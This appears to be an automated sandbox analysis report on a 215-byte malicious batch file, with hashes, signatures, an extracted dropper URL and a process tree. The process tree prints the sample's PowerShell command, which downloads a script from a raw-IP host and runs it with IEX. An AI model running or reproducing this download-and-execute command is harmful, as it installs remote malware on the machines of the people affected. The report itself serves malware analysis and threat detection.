Analysis
- max time kernel: 125s
- max time network: 153s
- platform: windows10_x64
- resource: win10v200430
- submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: b692cd395a2db4aacd53de584ee06ea0.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: b692cd395a2db4aacd53de584ee06ea0.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
- Target: b692cd395a2db4aacd53de584ee06ea0.bat
- Size: 215B
- MD5: 7b613efb2eb2240a79c12ff83b16d370
- SHA1: c74e994acea6c088e0590c14a99ccada44dd7c12
- SHA256: ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e
- SHA512: 7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source:
- URLs:
  ps1.dropper  http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0
Signatures
- Program crash (1 IoC)
  Processes:
  pid   pid_target  process       target process
  1544  1784        WerFault.exe  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                pid   process
  Token: SeRestorePrivilege  1544  WerFault.exe
  Token: SeBackupPrivilege   1544  WerFault.exe
  Token: SeDebugPrivilege    1544  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid   process
  1544  WerFault.exe  (the same entry is listed 14 times)
Processes
- C:\Windows\system32\cmd.exe (PID 1636)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1784)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (PID 1544)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 704
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses